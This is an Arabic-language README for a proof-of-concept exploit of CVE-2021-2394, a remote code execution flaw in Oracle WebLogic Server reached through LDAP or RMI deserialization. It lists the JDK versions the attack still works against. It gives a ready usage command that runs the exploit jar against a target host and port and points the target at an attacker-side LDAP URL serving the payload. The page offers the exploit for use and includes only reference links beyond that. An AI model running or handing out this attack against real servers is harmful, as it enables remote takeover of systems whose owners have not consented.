
استغلال إثبات المفهوم لـ CVE-2021-2394، وهي ثغرة تنفيذ التعليمات البرمجية عن بُعد في خادم Oracle WebLogic. يستخدم إلغاء تسلسل LDAP أو RMI لتسليم حمولة.
POC لـ CVE-2021-2394
ملاحظات
بالنسبة لطريقة الاستغلال القائمة على RMI، يقتصر إصدار JDK على الإصدارات قبل 6u132 و7u131 و8u121. في الإصدار 8u122 والإصدارات الأحدث، تمت إضافة آلية القائمة البيضاء لإلغاء التسلسل، وتم تعطيل التحميل البعيد للكود عبر RMI بالنسبة لطريقة الاستغلال القائمة على LDAP، يقتصر إصدار JDK على الإصدارات قبل 6u211 و7u201 و8u191 و11.0.1. في الإصدار 8u191، قامت Oracle بتعيين قيود على متجه LDAP، وأصدرت CVE-2018-3149، وأغلقت تحميل الفئات عن بعد عبر JNDI من: https://www.freebuf.com/vuls/279465.html
طريقة الاستخدام:
java -jar CVE_2021_2394.jar rhost rport ldapurljava -jar CVE_2021_2394.jar 192.168.137.1 7001 ldap://192.168.137.1:8087/Exploitروابط مرجعية:
التحديثات
مقال تحليلي